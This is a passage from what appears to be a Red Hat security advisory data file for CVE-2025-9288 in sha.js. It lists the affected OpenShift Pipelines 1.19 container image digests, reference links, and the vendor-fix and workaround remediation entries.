"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9288"
},
{
"category": "external",
"summary": "RHBZ#2389980",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389980"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288"
},
{
"category": "external",
"summary": "https://github.com/browserify/sha.js/pull/78",
"url": "https://github.com/browserify/sha.js/pull/78"
},
{
"category": "external",
"summary": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5",
"url": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
}
],
"release_date": "2025-08-20T21:59:44.728000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-09T10:09:13+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
